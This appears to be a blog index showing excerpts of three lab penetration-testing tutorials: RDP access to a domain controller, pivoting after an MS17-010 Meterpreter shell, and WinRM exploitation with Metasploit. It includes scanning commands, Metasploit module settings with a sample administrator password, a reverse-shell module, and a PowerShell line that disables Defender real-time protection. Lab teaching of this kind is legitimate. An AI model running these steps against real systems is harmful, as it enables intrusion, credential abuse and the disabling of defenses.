Exploiting RDP

First we will enable it on our EXTERNAL-RED domain controller, the Windows Server 2019 VM. Fire up the VM and open Server Manager. Refresh the page; it should now show Remote Desktop as enabled.
Imagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials and are connected to the company’s domain through RDP, and further set up persistent access to each compromised device to expand their foothold on the network.
Let’s start exploiting. Open Kali. First, a quick check of whether the target is visible on the network:
nmap -sn 192.168.83.0/24 --exclude 192.168.83.128
3. Identifying if RDP is running on the target 192.168.83.140 ...

November 24, 2025 · 3 min · 618 words · 0x-s0M3n4th

Lateral Movement and Pivoting

Lateral Movement and Pivoting: Lateral movement allows the penetration tester to move further into the targeted network while discovering additional assets and exploiting security vulnerabilities on remote systems, with the intent of stealing confidential data and expanding a foothold. Within many organizations, the network is usually segmented with routers and firewalls to prevent cyber-attacks and threats from propagating through the organization. However, there are various host devices configured with a dual-homed network connection, which simply allows the host to be connected to two different IP networks at the same time.
Our target will be the Blue VM first. Fire up the Blue VM and the Kali machine. Exploit it and get a shell using the MS17-010 exploit. On the Meterpreter session, use the arp command to view the entries in the Address Resolution Protocol (ARP) cache of the compromised target. The ARP cache contains a list of IP-to-MAC address bindings for all the host devices that recently exchanged messages with the compromised host:
meterpreter> arp
We can see that the target machine is on two networks: one is the NAT network, PENTEST-NET (192.168.83.0/24), and the other is PIVOT-NET (172.30.1.0/24).
6. Next, use the ipconfig command within Meterpreter to view a list of network adapters and their IP addresses ...

November 24, 2025 · 8 min · 1568 words · 0x-s0M3n4th

WinRM Exploitation

In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.
Exploitation: Open Kali for scanning and exploitation. Open up msfconsole for the exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
By default the command the module executes is ipconfig /all. Remember the local user setup for WinRM access, where we gave access to the user sysadmin; let’s try that. It actually worked.
Now let’s try for a remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
Also turn off real-time protection on your Windows Server, because it will quarantine the payload before it executes. Run this command in PowerShell on your DC:
Set-MpPreference -DisableRealtimeMonitoring $true
3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.
4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option if your target is an old system; otherwise, set it to false. Let’s see the options: ...

November 24, 2025 · 2 min · 313 words · 0x-s0M3n4th